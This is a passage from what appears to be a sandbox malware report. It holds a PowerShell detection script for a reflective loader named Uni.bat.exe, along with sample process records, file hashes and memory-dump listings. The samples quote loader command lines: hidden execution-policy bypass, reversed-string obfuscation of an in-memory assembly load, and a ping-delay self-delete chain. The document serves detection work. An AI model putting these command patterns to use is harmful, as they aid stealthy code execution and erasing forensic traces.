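        #    (the loader ran as Uni.bat.exe with -noprofile -windowstyle hidden -ep bypass).
        if ($cmd -match '(?i)-windowstyle\s+hidden' -and
            $cmd -match '(?i)-e(p|xecutionpolicy)\s+bypass' -and
            $img -notmatch '(?i)\\(powershell|pwsh)\.exe$') {
            $hits += 'PowerShell switches on non-PowerShell image'
        }

        # 2. Reversed-string obfuscation: 'gnirtS46esaBmorF'[-1..-16] -join '' rebuilds a
        #    method name at run time so it never appears literally in the command line.
        if ($cmd -match "\[-1\.\.-\d+\]\s*-join\s*''") {
            $hits += 'Reversed-string method-name obfuscation'
        }

        # 3. Reflective loading: a byte[] handed to Reflection.Assembly, then EntryPoint invoked.
        if ($cmd -match '(?i)Reflection\.Assembly' -and $cmd -match '(?i)\.EntryPoint') {
            $hits += 'In-memory Assembly load + EntryPoint.Invoke'
        }

        # 4. Self-delete chain: PING used as a sleep, then del /f of the dropper, in one cmd /C line.
        if ($img -match '(?i)\\cmd\.exe$' -and
            $cmd -match '(?i)ping\s+\S+\s+-n\s+\d+' -and
            $cmd -match '(?i)&\s*del\s+/f') {
            $hits += 'Ping-delay self-delete chain'
        }

        # 5. COM surrogate started by something other than svchost.exe (DcomLaunch normally
        #    starts them). Here Uni.bat.exe spawned three dllhost.exe /Processid:{...} children.
        if ($img -match '(?i)\\dllhost\.exe$' -and
            $cmd -match '(?i)/Processid:\{' -and
            $parent -notmatch '(?i)\\svchost\.exe$') {
            $hits += 'COM surrogate with unexpected parent (injection target candidate)'
        }

        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Image = $img; Parent = $parent; Indicators = ($hits -join '; ') }
        }
    }
}

# Constructed sample records (see lead-in: command lines from the tree, parents partly assumed).
$sample = @(
    @{ Image       = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe'
       ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = '"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command ... [System.Reflection.Assembly]::(''daoL''[-1..-4] -join '''')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag); ...' },
    @{ Image       = 'C:\Windows\SysWOW64\dllhost.exe'
       ParentImage = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe'
       CommandLine = 'C:\Windows\SysWOW64\dllhost.exe /Processid:{949b51b3-d7a3-4ebe-9b7b-1661ca7262d3}' },
    @{ Image       = 'C:\Windows\System32\cmd.exe'
       ParentImage = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe'
       CommandLine = '"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit' },
    # Benign controls (invented): a DcomLaunch-spawned surrogate and a real powershell.exe run.
    @{ Image       = 'C:\Windows\system32\DllHost.exe'
       ParentImage = 'C:\Windows\system32\svchost.exe'
       CommandLine = 'C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}' },
    @{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'powershell.exe -noprofile -windowstyle hidden -ep bypass -file C:\scripts\inventory.ps1' }
)

Test-LoaderIndicators -Events $sample | Format-Table -AutoSize -Wrap
```

Expect the first three records to be flagged (the loader on rules 1 to 3, the surrogate on rule 5, the cmd.exe chain on rule 4) and the two controls to pass. Rule 5 is the noisiest of the set in production; scope it to parents outside C:\Windows before deploying, and treat a hit together with the WerFault -p entries for the same PIDs, as seen in the tree, as a strong injection signal.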
Network

MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.12df61c7-aae2-4716-90ad-976a15d02c0b.tmp.txt
    Filesize: 13KB
    MD5:    e49a91c35a3e93de1bfdf6616c2328ba
    SHA1:   cabd8e485614f436db312cd874628c968b6c5a09
    SHA256: e4ec29d2fff5759311fe18056110c220b2e4f4266ba25c94ea103353c445dc14
    SHA512: 3620e84c8b558accd88ba9621e1bc2b560401af9d16d3205d15d57964270a263fed4f525a51104ce51b5a2d62ee34d0131a7df9b61083e2e40c350c202c834b1

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.32159128-5bec-486f-b33c-77dc558e48ea.tmp.csv
    Filesize: 38KB
    MD5:    111de18d867f6605ec8ef95e8f62a61b
    SHA1:   fb6478fcf6c9d38a6bedf96f3842a354d4cd894b
    SHA256: 4590e1ce2e030e31eceba617c9efb3addf1507925916f6f93ae1a4df4b61dc58
    SHA512: 586419d8007cb897d755b0a3feedda02ea7e633dc4481fa27ba854f3a5ed47fbbdb61c8cb39c00f4938c0fe3c50052b20e7f8a913ae459df79c993d5340224fe

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.aa6054ca-1e0c-498d-b7cc-7255b5d6d142.tmp.csv
    Filesize: 38KB
    MD5:    08d26e314205e87435a655698dff0da1
    SHA1:   ab6d7ea612bbf592f9b17964f5ac33b2ce9257bd
    SHA256: 309932e023d4b18b6e7be2dc48aa75fbf571a1addab30f43eeed48bbc760c331
    SHA512: d3a4334f047a7e8510d0999214598e9c31f8699818e5836e25a20bda524e04f9c9de33a18c5a4e8dafab0877c5a45c0e014a88b42d3f46af3b1bdd952e620e56

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ba1c0a87-68ab-441d-ba9d-f231ee7f9e98.tmp.csv
    Filesize: 39KB
    MD5:    880a1752754bba6bea1d8dec861954d0
    SHA1:   8ad513e12da9b3b4d1d5d99310aa5ca110e7bdfe
    SHA256: 822342fb07b9e9740915e7be3a57082bbdc6420d057e2474e59c26804f4900cd
    SHA512: 69a5ea7a7575c4c76a3a470eb45818dd0bbba9d67f115306c5616c5982853b22cb44d759bdfea8e4b12db632eba7a706cbf03791a042331f2e784fc325fdfa44

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bc3067cb-905f-4386-abab-9cdf5dd44fda.tmp.txt
    Filesize: 13KB
    MD5:    86b5f773c960d5f87983d7a2324383c3
    SHA1:   6ce7f749fd5bf242ae1bd7a579c644f1c8498202
    SHA256: 03209b3f7b23d01458ea97c4b65858e6c06ab73eba2d287076f9e92a06359f64
    SHA512: 6f1b9a59ff3f06650bde1eea56b9784845020b41896df5b00d18e5a78d46ab88de3a263334f009f5becf06e97fd5132109a5bf9753d5a84ad18139387a4ba8e4

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.c9bbd7d2-df8b-463d-b9bd-8d546ab18ce1.tmp.txt
    Filesize: 13KB
    MD5:    6e34153447e6d77a48e368983221a9c8
    SHA1:   233e5a7f8bca36c670734813a3d91ed4dcd2cc71
    SHA256: 6a4964794e07a3a317258cd459ab1662784d5fa7897132952fea29fd4112c543
    SHA512: fb47768a32cb1525b6929217fd58349511a8b514a9a81ae64d86c214dd45160a170bb0a301fbc747c728a91f495169d218aa1cd2784300f8f77504c16fa9e7a9

C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
    Filesize: 440KB
    MD5:    0e9ccd796e251916133392539572a374
    SHA1:   eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
    SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
    SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5qk3ivon.tpa.ps1
    Filesize: 60B
    MD5:    d17fe0a3f47be24a6453e9ef58c94641
    SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\$sxr-cmd.exe
    Filesize: 324KB
    MD5:    c5db7b712f280c3ae4f731ad7d5ea171
    SHA1:   e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
    SHA256: f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
    SHA512: bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

C:\Windows\$sxr-mshta.exe
    Filesize: 32KB
    MD5:    356e04e106f6987a19938df67dea0b76
    SHA1:   f2fd7cde5f97427e497dfb07b7f682149dc896fb
    SHA256: 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
    SHA512: df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
    Filesize: 412B
    MD5:    45a80505f42379c1c9515dbe048e2633
    SHA1:   070d78651bed3deab9c80048a7ff6869a8b9b986
    SHA256: cace9cb72a714cce6f7f50ab410fbd5cc11f06d0702a6ceb4157d619e3e2fac1
    SHA512: 9b9197c3e5bd240d370b31d622328baa5ca8d2edab573e119c19e67b9d3ead7a3c26cd901b036538a74015b522435e95743943801a63b26caee1e3837901c8a1

Memory dumps (region, size):

memory/460-108-0x000002667FCF0000-0x000002667FD17000-memory.dmp    156KB
memory/460-110-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/632-107-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/632-101-0x000001F76A7D0000-0x000001F76A7F2000-memory.dmp    136KB
memory/632-102-0x000001F76AA50000-0x000001F76AA77000-memory.dmp    156KB
memory/688-112-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/688-104-0x000001D0BB9C0000-0x000001D0BB9E7000-memory.dmp    156KB
memory/720-119-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/720-118-0x000001571DB70000-0x000001571DB97000-memory.dmp    156KB
memory/996-115-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/996-114-0x000001D714AB0000-0x000001D714AD7000-memory.dmp    156KB
memory/1036-122-0x000002A371EA0000-0x000002A371EC7000-memory.dmp    156KB
memory/1036-123-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/1044-126-0x000001BAF97D0000-0x000001BAF97F7000-memory.dmp    156KB
memory/1044-127-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/1100-135-0x0000021B26690000-0x0000021B266B7000-memory.dmp    156KB
memory/1100-136-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp    64KB
memory/1160-138-0x000002044A2E0000-0x000002044A307000-memory.dmp    156KB
memory/1360-80-0x00000224BA120000-0x00000224BA2E2000-memory.dmp    1.8MB
memory/1360-78-0x00000224B9D80000-0x00000224B9DD0000-memory.dmp    320KB
memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmp    7.8MB
memory/1360-65-0x00000224C2500000-0x00000224C293E000-memory.dmp    4.2MB
memory/1360-66-0x00000224C2940000-0x00000224C29F2000-memory.dmp    712KB
memory/1360-67-0x00000224B9160000-0x00000224B9182000-memory.dmp    136KB
memory/1360-68-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/1360-417-0x00000224BAE70000-0x00000224BB398000-memory.dmp    5.2MB
memory/1360-93-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp    756KB
memory/1360-61-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/1360-79-0x00000224B9E90000-0x00000224B9F42000-memory.dmp    712KB
memory/1360-62-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp    756KB
memory/1360-63-0x00000224B93A0000-0x00000224B9924000-memory.dmp    5.5MB
memory/1360-90-0x00000224B9DD0000-0x00000224B9E0C000-memory.dmp    240KB
memory/1360-91-0x00000224B9D30000-0x00000224B9D7E000-memory.dmp    312KB
memory/1360-92-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/1360-94-0x00000224B9E10000-0x00000224B9E46000-memory.dmp    216KB
memory/2452-33-0x0000000000400000-0x0000000000406000-memory.dmp    24KB
memory/2452-37-0x0000000000400000-0x0000000000406000-memory.dmp    24KB
memory/2604-35-0x0000000140000000-0x0000000140004000-memory.dmp    16KB
memory/2604-32-0x0000000140000000-0x0000000140004000-memory.dmp    16KB
memory/2624-25-0x000001E0BFAB0000-0x000001E0BFB56000-memory.dmp    664KB
memory/2624-39-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-22-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-38-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-23-0x000001E0BF060000-0x000001E0BFAB0000-memory.dmp    10.3MB
memory/2624-89-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-26-0x000001E0BECF0000-0x000001E0BED46000-memory.dmp    344KB
memory/2624-28-0x000001E0A66C0000-0x000001E0A66E2000-memory.dmp    136KB
memory/2624-29-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/2624-75-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-1385-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-31-0x000001E0BE9B0000-0x000001E0BE9BA000-memory.dmp    40KB
memory/2624-27-0x000001E0BFB60000-0x000001E0BFBB8000-memory.dmp    352KB
memory/2624-13-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-4-0x00007FFF12E13000-0x00007FFF12E15000-memory.dmp    8KB
memory/2624-15-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-21-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-20-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/2624-19-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp    756KB
memory/2624-14-0x000001E0BEA40000-0x000001E0BEA62000-memory.dmp    136KB
memory/2624-74-0x00007FFF12E13000-0x00007FFF12E15000-memory.dmp    8KB
memory/2624-419-0x000001E0C0050000-0x000001E0C0072000-memory.dmp    136KB
memory/2624-18-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/2624-17-0x000001E0A6690000-0x000001E0A66B4000-memory.dmp    144KB
memory/2624-16-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp    10.8MB
memory/3552-99-0x0000000140000000-0x0000000140028000-memory.dmp    160KB
memory/3552-98-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp    756KB
memory/3552-97-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp    2.0MB
memory/3552-96-0x0000000140000000-0x0000000140028000-memory.dmp    160KB
memory/3552-95-0x0000000140000000-0x0000000140028000-memory.dmp    160KB